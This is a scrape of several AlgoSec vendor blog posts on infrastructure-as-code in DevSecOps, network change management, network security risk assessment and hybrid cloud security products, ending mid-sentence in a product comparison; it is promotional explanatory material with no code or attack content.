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Anat Kleinmann, AlgoSec Sr. Product Manager and IaC expert, discusses how incorporating Infrastructure-as-Code into DevSecOps can allow... Risk Management and Vulnerabilities Bridging the DevSecOps Application Connectivity Disconnect via IaC Anat Kleinmann 2 min read Anat Kleinmann Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/7/22 Published Anat Kleinmann, AlgoSec Sr. Product Manager and IaC expert, discusses how incorporating Infrastructure-as-Code into DevSecOps can allow teams to take a preventive approach to secure application connectivity . With customer demands changing at breakneck speed, organizations need to be agile to win in their digital markets. This requires fast and frequent application deployments, forcing DevOps teams to streamline their software development processes. However, without the right security tools placed in the early phase of the CI/CD pipeline, these processes can be counterproductive leading to costly human errors and prolonged application deployment backups. This is why organizations need to find the right preventive security approach and explore achieving this through Infrastructure-as-Code. Understanding Infrastructure as Code – what does it actually mean? Infrastructure-as-Code (Iac) is a software development method that describes the complete environment in which the software runs. It contains information about the hardware, networks, and software that are needed to run the application. IAC is also referred to as declarative provisioning or automated provisioning. In other words, IAC enables security teams to create an automated and repeatable process to build out an entire environment. This is helpful for eliminating human errors that can be associated with manual configuration. The purpose of IaC is to enable developers or operations teams to automatically manage, monitor and provision resources, rather than manually configure discrete hardware devices and operating systems. What does IaC mean in the context of running applications in a cloud environment When using IaC, network configuration files can contain your applications connectivity infrastructure connectivity specifications changes, which mkes it easier to edit, review and distribute. It also ensures that you provision the same environment every time and minimizes the downtime that can occur due to security breaches. Using Infrastructure as code (IaC) helps you to avoid undocumented, ad-hoc configuration changes and allows you to enforce security policies in advance before making the changes in your network. Top 5 challenges when not embracing a preventive security approach Counterintuitive communication channel – When reviewing the code manually, DevOps needs to provide access to a security manager to review it and rely on the security manager for feedback. This can create a lot of unnecessary back and forth communication between the teams which can be a highly counterintuitive process. Mismanagement of DevOps resources – Developers need to work on multiple platforms due to the nature of their work. This may include developing the code in one platform, checking the code in another, testing the code in a third platform and reviewing requests in a fourth platform. When this happens, developers often will not be alerted of any network risk or non-compliance issue as defined by the organization. Mismanagement of SecOps resources – At the same time, network security managers are also bombarded with security review requests and tasks. Yet, they are expected to be agile, which is impossible in case of manual risk detection. Inefficient workflow – Sometimes risk analysis process is skipped and only reviewed at the end of the CI/CD pipeline, which prolongs the delivery of the application. Time consuming review process – The risk analysis review itself can sometimes take more than 30 minutes long which can create unnecessary and costly bottlenecking, leading to missed rollout deadlines of critical applications Why it’s important to place security early in the development cycle Infrastructure-as-code (IaC) is a crucial part of DevSecOps practices. The current trend is based on the principle of shift-left, which places security early in the development cycle. This allows organizations to take a proactive, preventive approach rather than a reactive one. This approach solves the problem of developers leaving security checks and testing for the later stages of a project often as it nears completion and deployment. It is critical to take a proactive approach since late-stage security checks lead to two critical problems. Security flaws can go undetected and make it into the released software, and security issues detected at the end of the software development lifecycle demand considerably more time, resources and money to remediate than those identified early on. The Power of IaC Connectivity Risk Analysis and Key Benefits IaC connectivity risk analysis provides automatic and proactive connectivity risk analysis, enabling a frictionless workflow for DevOps with continuous customized risk analysis and remediation managed and controlled by the security managers. IaC Connectivity Risk Analysis enables organizations to use a single source of truth for managing the lifecycle of their applications. Furthermore, security engineers can use IaC to automate the design, deployment, and management of virtual assets across a hybrid cloud environment. With automated security tests, engineers can also continuously test their infrastructure for security issues early in the development phase. Key benefits Deliver business applications into production faster and more securely Enable a frictionless workflow with continuous risk analysis and remediation Reduce connectivity risks earlier in the CI/CD process Customizable risk policy to surface only the most critical risks The Takeaway Don’t get bogged down by security and compliance. When taking a preventive approach using a connectivity risk analysis via IaC, you can increase the speed of deployment, reduce misconfiguration and compliance errors, improve DevOps – SecOps relationship and lower costs Next Steps Let AlgoSec’s IaC Connectivity Risk Analysis can help you take a proactive, preventive security approach to get DevOps’ workflow early in the game, automatically identifying connectivity risks and providing ways to remediate them. Watch this video or visit us at GitHub to learn how. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

What is network change management? Network Change Management (NCM) is the process of planning, testing, and approving changes to a... Network Security Policy Management Network Change Management: Best Practices for 2024 Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/8/24 Published What is network change management? Network Change Management (NCM) is the process of planning, testing, and approving changes to a network infrastructure. The goal is to minimize network disruptions by following standardized procedures for controlled network changes. NCM, or network configuration and change management (NCCM), is all about staying connected and keeping things in check. When done the right way, it lets IT teams seamlessly roll out and track change requests, and boost the network’s overall performance and safety. There are 2 main approaches to implementing NCM: manual and automated. Manual NCM is a popular choice that’s usually complex and time-consuming. A poor implementation may yield faulty or insecure configurations causing disruptions or potential noncompliance. These setbacks can cause application outages and ultimately need extra work to resolve. Fortunately, specialized solutions like the AlgoSec platform and its FireFlow solution exist to address these concerns. With inbuilt intelligent automation, these solutions make NCM easier as they cut out errors and rework usually tied to manual NCM. The network change management process The network change management process is a structured approach that organizations use to manage and implement changes to their network infrastructure. When networks are complex with many interdependent systems and components, change needs to be managed carefully to avoid unintended impacts. A systematic NCM process is essential to make the required changes promptly, minimize risks associated with network modifications, ensure compliance, and maintain network stability. The most effective NCM process leverages an automated NCM solution like the intelligent automation provided by the AlgoSec platform to streamline effort, reduce the risks of redundant changes, and curtail network outages and downtime. The key steps involved in the network change management process are: Step 1: Security policy development and documentation Creating a comprehensive set of security policies involves identifying the organization’s specific security requirements, relevant regulations, and industry best practices. These policies and procedures help establish baseline configurations for network devices. They govern how network changes should be performed – from authorization to execution and management. They also document who is responsible for what, how critical systems and information are protected, and how backups are planned. In this way, they address various aspects of network security and integrity, such as access control , encryption, incident response, and vulnerability management. Step 2: Change the request A formal change request process streamlines how network changes are requested and approved. Every proposed change is clearly documented, preventing the implementation of ad-hoc or unauthorized changes. Using an automated tool ensures that every change complies with the regulatory standards relevant to the organization, such as HIPAA, PCI-DSS, NIST FISMA, etc. This tool should be able to send automated notifications to relevant stakeholders, such as the Change Advisory Board (CAB), who are required to validate and approve normal and emergency changes (see below). Step 3: Change Implementation Standard changes – those implemented using a predetermined process, need no validation or testing as they’re already deemed low- or no-risk. Examples include installing a printer or replacing a user’s laptop. These changes can be easily managed, ensuring a smooth transition with minimal disruption to daily operations. On the other hand, normal and emergency changes require testing and validation, as they pose a more significant risk if not implemented correctly. Normal changes, such as adding a new server or migrating from on-premises to the cloud, entail careful planning and execution. Emergency changes address urgent issues that could introduce risks if not resolved promptly, like failing to install security patches or software upgrades, which may leave networks vulnerable to zero-day exploits and cyberattacks. Testing uncovers these potential risks, such as network downtime or new vulnerabilities that increase the likelihood of a malware attack. Automated network change management (NCM) solutions streamline simple changes, saving time and effort. For instance, AlgoSec’s firewall policy cleanup solution optimizes changes related to firewall policies, enhancing efficiency. Documenting all implemented changes is vital, as it maintains accountability and service level agreements (SLAs) while providing an audit trail for optimization purposes. The documentation should outline the implementation process, identified risks, and recommended mitigation steps. Network teams must establish monitoring systems to continuously review performance and flag potential issues during change implementation. They must also set up automated configuration backups for devices like routers and firewalls ensuring that organizations can recover from change errors and avoid expensive downtime. Step 4: Troubleshooting and rollbacks Rollback procedures are important because they provide a way to restore the network to its original state (or the last known “good” configuration) if the proposed change could introduce additional risk into the network or deteriorate network performance. Some automated tools include ready-to-use templates to simplify configuration changes and rollbacks. The best platforms use a tested change approval process that enables organizations to avoid bad, invalid, or risky configuration changes before they can be deployed. Troubleshooting is also part of the NCM process. Teams must be trained in identifying and resolving network issues as they emerge, and in managing any incidents that may result from an implemented change. They must also know how to roll back changes using both automated and manual methods. Step 5: Network automation and integration Automated network change management (NCM) solutions streamline and automate key aspects of the change process, such as risk analysis, implementation, validation, and auditing. These automated solutions prevent redundant or unauthorized changes, ensuring compliance with applicable regulations before deployment. Multi-vendor configuration management tools eliminate the guesswork in network configuration and change management. They empower IT or network change management teams to: Set real-time alerts to track and monitor every change Detect and prevent unauthorized, rogue, and potentially dangerous changes Document all changes, aiding in SLA tracking and maintaining accountability Provide a comprehensive audit trail for auditors Execute automatic backups after every configuration change Communicate changes to all relevant stakeholders in a common “language” Roll back undesirable changes as needed AlgoSec’s NCM platform can also be integrated with IT service management (ITSM) and ticketing systems to improve communication and collaboration between various teams such as IT operations and admins. Infrastructure as code (IaC) offers another way to automate network change management. IaC enables organizations to “codify” their configuration specifications in config files. These configuration templates make it easy to provision, distribute, and manage the network infrastructure while preventing ad-hoc, undocumented, or risky changes. Risks associated with network change management Network change management is a necessary aspect of network configuration management. However, it also introduces several risks that organizations should be aware of. Network downtime The primary goal of any change to the network should be to avoid unnecessary downtime. Whenever these network changes fail or throw errors, there’s a high chance of network downtime or general performance. Depending on how long the outage lasts, it usually results in users losing productive time and loss of significant revenue and reputation for the organization. IT service providers may also have to monitor and address potential issues, such as IP address conflicts, firmware upgrades, and device lifecycle management. Human errors Manual configuration changes introduce human errors that can result in improper or insecure device configurations. These errors are particularly prevalent in complex or large-scale changes and can increase the risk of unauthorized or rogue changes. Security issues Manual network change processes may lead to outdated policies and rulesets, heightening the likelihood of security concerns. These issues expose organizations to significant threats and can cause inconsistent network changes and integration problems that introduce additional security risks. A lack of systematic NCM processes can further increase the risk of security breaches due to weak change control and insufficient oversight of configuration files, potentially allowing rogue changes and exposing organizations to various cyberattacks. Compliance issues Poor NCM processes and controls increase the risk of non-compliance with regulatory requirements. This can potentially result in hefty financial penalties and legal liabilities that may affect the organization’s bottom line, reputation, and customer relationships. Rollback failures and backup issues Manual rollbacks can be time-consuming and cumbersome, preventing network teams from focusing on higher-value tasks. Additionally, a failure to execute rollbacks properly can lead to prolonged network downtime. It can also lead to unforeseen issues like security flaws and exploits. For network change management to be effective, it’s vital to set up automated backups of network configurations to prevent data loss, prolonged downtime, and slow recovery from outages. Troubleshooting issues Inconsistent or incorrect configuration baselines can complicate troubleshooting efforts. These wrong baselines increase the chances of human error, which leads to incorrect configurations and introduces security vulnerabilities into the network. Simplified network change management with AlgoSec AlgoSec’s configuration management solution automates and streamlines network management for organizations of all types. It provides visibility into the configuration of every network device and automates many aspects of the NCM process, including change requests, approval workflows, and configuration backups. This enables teams to safely and collaboratively manage changes and efficiently roll back whenever issues or outages arise. The AlgoSec platform monitors configuration changes in real-time. It also provides compliance assessments and reports for many security standards, thus helping organizations to strengthen and maintain their compliance posture. Additionally, its lifecycle management capabilities simplify the handling of network devices from deployment to retirement. Vulnerability detection and risk analysis features are also included in AlgoSec’s solution. The platform leverages these features to analyze the potential impact of network changes and highlight possible risks and vulnerabilities. This information enables network teams to control changes and ensure that there are no security gaps in the network. Click here to request a free demo of AlgoSec’s feature-rich platform and its configuration management tools. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

For your organization to implement robust security policies, it must have clear information on the security risks it is exposed to. An... Uncategorized How to Perform a Network Security Risk Assessment in 6 Steps Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 1/18/24 Published For your organization to implement robust security policies, it must have clear information on the security risks it is exposed to. An effective IT security plan must take the organization’s unique set of systems and technologies into account. This helps security professionals decide where to deploy limited resources for improving security processes. Cybersecurity risk assessments provide clear, actionable data about the quality and success of the organization’s current security measures. They offer insight into the potential impact of security threats across the entire organization, giving security leaders the information they need to manage risk more effectively. Conducting a comprehensive cyber risk assessment can help you improve your organization’s security posture, address security-related production bottlenecks in business operations, and make sure security team budgets are wisely spent. This kind of assessment is also a vital step in the compliance process . Organizations must undergo information security risk assessments in order to meet regulatory requirements set by different authorities and frameworks, including: The Health Insurance Portability and Accountability Act (HIPAA), The International Organization for Standardization (ISO) The National Institute of Standards and Technology (NIST) Cybersecurity Framework The Payment Card Industry Data Security Standard (PCI DSS) General Data Protection Regulation (GDPR) What is a Security Risk Assessment? Your organization’s security risk assessment is a formal document that identifies, evaluates, and prioritizes cyber threats according to their potential impact on business operations. Categorizing threats this way allows cybersecurity leaders to manage the risk level associated with them in a proactive, strategic way. The assessment provides valuable data about vulnerabilities in business systems and the likelihood of cyber attacks against those systems. It also provides context into mitigation strategies for identified risks, which helps security leaders make informed decisions during the risk management process. For example, a security risk assessment may find that the organization needs to be more reliant on its firewalls and access control solutions . If a threat actor uses phishing or social engineering to bypass these defenses (or take control of them entirely), the entire organization could suffer a catastrophic data breach. In this case, the assessment may recommend investing in penetration testing and advanced incident response capabilities. Organizations that neglect to invest in network security risk assessments won’t know their weaknesses until after they are actively exploited. By the time hackers launch a ransomware attack, it’s too late to consider whether your antivirus systems are properly configured against malware. Who Should Perform Your Organization’s Cyber Risk Assessment? A dedicated internal team should take ownership over the risk assessment process . The process will require technical personnel with a deep understanding of the organization’s IT infrastructure. Executive stakeholders should also be involved because they understand how information flows in the context of the organization’s business logic, and can provide broad insight into its risk management strategy . Small businesses may not have the resources necessary to conduct a comprehensive risk analysis internally. While a variety of assessment tools and solutions are available on the market, partnering with a reputable managed security service provider is the best way to ensure an accurate outcome. Adhering to a consistent methodology is vital, and experienced vulnerability assessment professionals ensure the best results. How to Conduct a Network Security Risk Assessment 1. Develop a comprehensive asset map The first step is accurately mapping out your organization’s network assets. If you don’t have a clear idea of exactly what systems, tools, and applications the organization uses, you won’t be able to manage the risks associated with them. Keep in mind that human user accounts should be counted as assets as well. The Verizon 2023 Data Breach Investigation Report shows that the human element is involved in more than a quarter of all data breaches. The better you understand your organization’s human users and their privilege profiles, the more effectively you can protect them from potential threats and secure critical assets effectively. Ideally, all of your organization’s users should be assigned and managed through a centralized system. For Windows-based networks, Active Directory is usually the solution that comes to mind. Your organization may have a different system in place if it uses a different operating system. Also, don’t forget about information assets like trade secrets and intellectual property. Cybercriminals may target these assets in order to extort the organization. Your asset map should show you exactly where these critical assets are stored, and provide context into which users have permission to access them. Log and track every single asset in a central database that you can quickly access and easily update. Assign security value to each asset as you go and categorize them by access level . Here’s an example of how you might want to structure that categorization: Public data. This is data you’ve intentionally made available to the public. It includes web page content, marketing brochures, and any other information of no consequence in a data breach scenario. Confidential data. This data is not publicly available. If the organization shares it with third parties, it is only under a non-disclosure agreement. Sensitive technical or financial information may end up in this category. Internal use only. This term refers to data that is not allowed outside the company, even under non-disclosure terms. It might include employee pay structures, long-term strategy documents, or product research data. Intellectual property. Any trade secrets, issued patents, or copyrighted assets are intellectual property. The value of the organization depends in some way on this information remaining confidential. Compliance restricted data. This category includes any data that is protected by regulatory or legal obligations. For a HIPAA-compliant organization, that would include patient data, medical histories, and protected personal information. This database will be one of the most important security assessment tools you use throughout the next seven steps. 2. Identify security threats and vulnerabilities Once you have a comprehensive asset inventory, you can begin identifying risks and vulnerabilities for each asset. There are many different types of tests and risk assessment tools you can use for this step. Automating the process whenever possible is highly recommended, since it may otherwise become a lengthy and time-consuming manual task. Vulnerability scanning tools can automatically assess your network and applications for vulnerabilities associated with known threats. The scan’s results will tell you exactly what kinds of threats your information systems are susceptible to, and provide some information about how you can remediate them. Be aware that these scans can only determine your vulnerability to known threats. They won’t detect insider threats , zero-day vulnerabilities and some scanners may overlook security tool misconfigurations that attackers can take advantage of. You may also wish to conduct a security gap analysis. This will provide you with comprehensive information about how your current security program compares to an established standard like CMMC or PCI DSS. This won’t help protect against zero-day threats, but it can uncover information security management problems and misconfigurations that would otherwise go unnoticed. To take this step to the next level, you can conduct penetration testing against the systems and assets your organization uses. This will validate vulnerability scan and gap analysis data while potentially uncovering unknown vulnerabilities in the process. Pentesting replicates real attacks on your systems, providing deep insight into just how feasible those attacks may be from a threat actor’s perspective. When assessing the different risks your organization faces, try to answer the following questions: What is the most likely business outcome associated with this risk? Will the impact of this risk include permanent damage, like destroyed data? Would your organization be subject to fines for compliance violations associated with this risk? Could your organization face additional legal liabilities if someone exploited this risk? 3. Prioritize risks according to severity and likelihood Once you’ve conducted vulnerability scans and assessed the different risks that could impact your organization, you will be left with a long list of potential threats. This list will include more risks and hazards than you could possibly address all at once. The next step is to go through the list and prioritize each risk according to its potential impact and how likely it is to happen. If you implemented penetration testing in the previous step, you should have precise data on how likely certain attacks are to take place. Your team will tell you how many steps they took to compromise confidential data, which authentication systems they had to bypass, and what other security functionalities they disabled. Every additional step reduces the likelihood of a cybercriminal carrying out the attack successfully. If you do not implement penetration testing, you will have to conduct an audit to assess the likelihood of attackers exploiting your organization’s vulnerabilities. Industry-wide threat intelligence data can give you an idea of how frequent certain types of attacks are. During this step, you’ll have to balance the likelihood of exploitation with the severity of the potential impact for each risk. This will require research into the remediation costs associated with many cyberattacks. Remediation costs should include business impact – such as downtime, legal liabilities, and reputational damage – as well as the cost of paying employees to carry out remediation tasks. Assigning internal IT employees to remediation tasks implies the opportunity cost of diverting them from their usual responsibilities. The more completely you assess these costs, the more accurate your assessment will be. 4. Develop security controls in response to risks Now that you have a comprehensive overview of the risks your organization is exposed to, you can begin developing security controls to address them. These controls should provide visibility and functionality to your security processes, allowing you to prevent attackers from exploiting your information systems and detect them when they make an attempt. There are three main types of security control available to the typical organization: Physical controls prevent unauthorized access to sensitive locations and hardware assets. Security cameras, door locks, and live guards all contribute to physical security. These controls prevent external attacks from taking place on premises. Administrative controls are policies, practices, and workflows that secure business assets and provide visibility into workplace processes. These are vital for protecting against credential-based attacks and malicious insiders. Technical controls include purpose-built security tools like hardware firewalls, encrypted data storage solutions, and antivirus software. Depending on their configuration, these controls can address almost any type of threat. These categories have further sub-categories that describe how the control interacts with the threat it is protecting against. Most controls protect against more than one type of risk, and many controls will protect against different risks in different ways. Here are some of the functions of different controls that you should keep in mind: Detection-based controls trigger alerts when they discover unauthorized activity happening on the network. Intrusion detection systems (IDS) and security information and event management (SIEM) platforms are examples of detection-based solutions. When you configure one of these systems to detect a known risk, you are implementing a detection-based technical control. Prevention-based controls block unauthorized activity from taking place altogether. Authentication protocols and firewall rules are common examples of prevention-based security controls. When you update your organization’s password policy, you are implementing a prevention-based administrative control. Correction and compensation-based controls focus on remediating the effects of cyberattacks once they occur. Disaster recovery systems and business continuity solutions are examples. When you copy a backup database to an on-premises server, you are establishing physical compensation-based controls that will help you recover from potential threats. 5. Document the results and create a remediation plan Once you’ve assessed your organization’s exposure to different risks and developed security controls to address those risks, you are ready to condense them into a cohesive remediation plan . You will use the data you’ve gathered so far to justify the recommendations you make, so it’s a good idea to present that data visually. Consider creating a risk matrix to show how individual risks compare to one another based on their severity and likelihood. High-impact risks that have a high likelihood of occurring should draw more time and attention than risks that are either low-impact, unlikely, or both. Your remediation plan will document the steps that security teams will need to take when responding to each incident you describe. If multiple options exist for a particular vulnerability, you may add a cost/benefit analysis of multiple approaches. This should provide you with an accurate way to quantify the cost of certain cyberattacks and provide a comparative cost for implementing controls against that type of attack. Comparing the cost of remediation with the cost of implementing controls should show some obvious options for cybersecurity investment. It’s easy to make the case for securing against high-severity, high-likelihood attacks with high remediation costs and low control costs. Implementing security patches is an example of this kind of security control that costs very little but provides a great deal of value in this context. Depending on your organization’s security risk profile, you may uncover other opportunities to improve security quickly. You will probably also find opportunities that are more difficult or expensive to carry out. You will have to pitch these opportunities to stakeholders and make the case for their approval. 6. Implement recommendations and evaluate the effectiveness of your assessment Once you have approval to implement your recommendations, it’s time for action. Your security team can now assign each item in the remediation plan to the team member responsible and oversee their completion. Be sure to allow a realistic time frame for each step in the process to be completed – especially if your team is not actively executing every task on its own. You should also include steps for monitoring the effectiveness of their efforts and documenting the changes they make to your security posture. This will provide you with key performance metrics that you can compare with future network security assessments moving forward, and help you demonstrate the value of your remediation efforts overall. Once you have implemented the recommendations, you can monitor and optimize the performance of your information systems to ensure your security posture adapts to new threats as they emerge. Risk assessments are not static processes, and you should be prepared to conduct internal audits and simulate the impact of configuration changes on your current deployment. You may wish to repeat your risk evaluation and gap analysis step to find out how much your organization’s security posture has changed. You can use automated tools like AlgoSec to conduct configuration simulations and optimize the way your network responds to new and emerging threats. Investing time and energy into these tasks now will lessen the burden of your next network security risk assessment and make it easier for you to gain approval for the recommendations you make in the future. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Hybrid cloud security uses a combination of on-premises equipment, private cloud deployments, and public cloud platforms to secure an... Uncategorized Top 6 Hybrid Cloud Security Solutions: Key Features for 2024 Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 1/15/24 Published Hybrid cloud security uses a combination of on-premises equipment, private cloud deployments, and public cloud platforms to secure an organization’s data, apps, and assets. It’s vital to the success of any organization that uses hybrid cloud network infrastructure. The key factors that make hybrid cloud security different from other types of security solutions are flexibility and agility. Your hybrid cloud security solution must be able to prevent, detect, and respond to threats regardless of the assets they compromise. That means being able to detect anomalous behaviors and enforce policies across physical endpoints, cloud-hosted software-as-a-service (SaaS) deployments, and in public cloud data centers. You need visibility and control wherever your organization stores or processes sensitive data. What is Hybrid Cloud Security? To understand hybrid cloud security, we must first cover exactly what the hybrid cloud is and how it works. Hybrid cloud infrastructure generally refers to any combination of public cloud providers (like AWS, Azure, Google Cloud) and private cloud environments. It’s easy to predict the security challenges hosting some of your organization’s apps on public cloud infrastructure and other apps on its own private cloud. How do you gain visibility across these different environments? How do you address vulnerabilities and misconfiguration risks? Hybrid cloud architecture can create complex problems for security leaders. However, it provides organizations with much-needed flexibility and offers a wide range of data deployment options. Most enterprises use a hybrid cloud strategy because it’s very rare for a large organization to entrust its entire IT infrastructure to a single vendor. As a result, security leaders need to come up with solutions that address the risks unique to hybrid cloud environments. Key Features of Hybrid Cloud Security An optimized hybrid cloud security solution gives the organization a centralized point of reference for managing security policies and toolsets across the entire environment. This makes it easier for security leaders to solve complex problems and detect advanced threats before they evolve into business disruptions. Hybrid cloud infrastructure can actually improve your security posture if managed appropriately. Some of the things you can do in this kind of environment include: Manage security risk more effectively. Lock down your most sensitive and highly regulated data in infrastructure under your direct control, while saving on cloud computing costs by entrusting less sensitive data to a third party. Distribute points of failure. Diversifying your organization’s cloud infrastructure reduces your dependence on any single cloud platform. This amplifies many of the practical benefits of network segmentation. Implement Zero Trust. Hybrid cloud networks can be configured with strict access control and authentication policies. These policies should work without regard to the network’s location, providing a strong foundation for demonstrating Zero Trust . Navigate complex compliance requirements. Organizations with hybrid cloud infrastructure are well-prepared to meet strict compliance requirements that apply to certain regions, like CCPA or GDPR data classification . With the right tools, demonstrating compliance through custom reports is easy. Real-time monitoring and remediation . With the right hybrid cloud security solutions in place, you can gain in-depth oversight into cloud workloads and respond immediately to security incidents when they occur. How Do Hybrid Cloud Security Solutions Work? Integration with Cloud Platforms The first step towards building a hybrid cloud strategy is determining how your cloud infrastructure deployments will interact with one another. This requires carefully reviewing the capabilities of the major public cloud platforms you use and determining your own private cloud integration capabilities. You will need to ensure seamless operation between these platforms while retaining visibility over your entire network. using APIs to programmatically connect different aspects of your cloud environment can help automate some of the most time-intensive manual tasks. For example, you may need to manage security configurations and patch updates across many different cloud resources. This will be very difficult and time-consuming if done manually, but a well-integrated automation-ready policy management solution can make it easy. Security Controls and Measures Your hybrid cloud solution will also need to provide comprehensive tools for managing firewalls and endpoints throughout your environment. These security tools can’t work in isolation — they need consistent policies informed by observation of your organization’s real-world risk profile. That means you’ll need to deploy a centralized solution for managing the policies and rulesets these devices use, and continuously configure them to address the latest threats. You will also need to configure your hybrid cloud network to prevent lateral movement and make it harder for internal threat actors to execute attacks. This is achieved with network segmentation, which partitions different parts of your network into segments that do not automatically accept traffic from one another. Microsegmentation further isolates different assets in your network according to their unique security needs, allowing access only to an exclusive set of users and assets. Dividing cloud workloads and resources into micro-segmented network zones improves network security and makes it harder for threat actors to successfully launch malware and ransomware attacks. It reduces the attack surface and enhances your endpoint security capabilities by enabling you to quarantine compromised endpoints the moment you detect unauthorized activity. How to Choose a Hybrid Cloud Security Provider Your hybrid cloud security provider should offer an extensive range of features that help you optimize your cloud service provider’s security capabilities. It should seamlessly connect your security team to the cloud platforms it’s responsible for protecting, while providing relevant context and visibility into cloud security threats. Here are some of the key features to look out for when choosing a hybrid cloud security provider: Scalability and Flexibility. The solution must scale according to your hybrid environment’s needs. Changing security providers is never easy, and you should project its capabilities well into the future before deciding to go through with the implementation. Pay close attention to usage and pricing models that may not be economically feasible as your organization grows. SLAs and Compliance. Your provider must offer service-level agreements that guarantee a certain level of performance. These SLAs will also play an important role ensuring compliance requirements are always observed, especially in highly regulated sectors like healthcare. Security Posture Assessment. You must be able to easily leverage the platform to assess and improve your overall security posture in a hybrid cloud model. This requires visibility and control over your data, regardless of where it is stored or processed. Not all hybrid cloud security solutions have the integrations necessary to make this feasible. DevSecOps Integration. Prioritize cloud security providers that offer support for integrating security best practices into DevOps, and providing security support early in the software development lifecycle. If your organization plans on building continuous deployment capabilities now or in the future, you will need to ensure your cloud security platform is capable of supporting those workflows. Top 6 Hybrid Cloud Security Solutions 1. AlgoSec AlgoSec is an application connectivity platform that manages security policies across hybrid and multi-cloud environments . It allows security leaders to take control of their apps and security tools, managing and enforcing policies that safeguard cloud services from threats. AlgoSec supports the automation of data security policy changes and allows users to simulate configuration changes across their tech stack. This makes it a powerful tool for in-depth risk analysis and compliance reporting, while giving security leaders the features they need to address complex hybrid cloud security challenges . Key Features: Complete network visualization. AlgoSec intelligently analyzes application dependencies across the network, giving security teams clear visibility into their network topology. Zero-touch change management. Customers can automate application and policy connectivity changes without requiring manual interaction between administrators and security tools. Comprehensive security policy management. AlgoSec lets administrators manage security policies across cloud and on-premises infrastructure, ensuring consistent security throughout the organization. What Do People Say About AlgoSec? AlgoSec is highly rated for its in-depth policy management capabilities and its intuitive, user-friendly interface. Customers praise its enhanced visibility, intelligent automation, and valuable configuration simulation tools. AlgoSec provides security professionals with an easy way to discover and map their network, and scale policy management even as IT infrastructure grows. 2. Microsoft Azure Security Center Microsoft Azure Security Center provides threat protection and unified security management across hybrid cloud workloads. As a leader in cloud computing, Microsoft has equipped Azure Security Center with a wide range of cloud-specific capabilities like advanced analytics, DevOps integrations, and comprehensive access management features into a single cloud-native solution. Adaptive Application Controls leverages machine learning to give users personalized recommendations for whitelisting applications. Just-in-Time VM Access protects cloud infrastructure from brute force attacks by reducing access when virtual machines are not needed. Key Features: Unified security management. Microsoft’s security platform offers visibility both into cloud workflows and non-cloud assets. It can map your hybrid network and enable proactive threat detection across the enterprise tech stack. Continuous security assessments. The platform supports automated security assessments for network assets, services, and applications. It triggers alerts notifying administrators when vulnerabilities are detected. Infrastructure-as-a-service (IaaS) compatibility. Microsoft enables customers to extend visibility and protection to the IaaS layer, providing uniform security and control across hybrid networks. What Do People Say About Microsoft Azure Security Center? Customers praise Microsoft’s hybrid cloud security solution for its user-friendly interface and integration capabilities. However, many users complain about false positives. These may be the result of security tool misconfigurations that lead to unnecessary disruptions and expensive investigations. 3. Amazon AWS Security Hub Amazon AWS Security Hub is a full-featured cloud security posture management solution that centralized security alerts and enables continuous monitoring of cloud infrastructure. It provides a detailed view of security alerts and compliance status across the hybrid environment. Security leaders can use Amazon AWS Security Hub to automate compliance checks, and manage their security posture through a centralized solution. It provides extensive API support and can integrate with a wide variety of additional tools. Key Features: Automated best practice security checks. AWS can continuously check your security practices against a well-maintained set of standards developed by Amazon security experts. Excellent data visualization capabilities. Administrators can customize the Security Hub dashboard according to specific compliance requirements and generate custom reports to demonstrate security performance. Uniform formatting for security findings. AWS uses its own format — the AWS Security Findings Format (ASFF) — to eliminate the need to normalize data across multiple tools and platforms. What Do People Say About Amazon AWS Security Hub? Amazon’s Security Hub is an excellent choice for native cloud security posture management, providing granular control and easy compliance. However, the platform’s complexity and lack of visibility does not resonate well with all customers. Some organizations will need to spend considerable time and effort building comprehensive security reports. 4. Google Cloud Security Command Center Google’s centralized platform helps administrators identify and remediate security risks in Google Cloud and hybrid environments. It is designed to identify misconfigurations and vulnerabilities while making it easier for security leaders to manage regulatory compliance. Some of the key features it offers include real-time threat detection, security health analytics, and risk assessment tools. Google can also simulate the attack path that threat actors might use to compromise cloud networks. Key Features: Multiple service tiers. The standard service tier provides security health analytics and alerts, while the premium tier offers attack path simulations and event threat detection capabilities. AI-generated summaries. Premium subscribers can read dynamically generated summaries of security findings and attack paths in natural language, reducing this technology’s barrier to entry. Cloud infrastructure entitlement management. Google’s platform supports cloud infrastructure entitlement management, which exposes misconfigurations at the principal account level from an identity-based framework What Do People Say About Google Cloud Security Command Center? Customers applaud the feature included in Google’s premium tier for this service, but complain that it can be hard to get. Not all organizations meet the requirements necessary to use this platform’s most advanced features. Once properly implemented and configured, however, it provides state-of-the-art cloud security that integrates well with 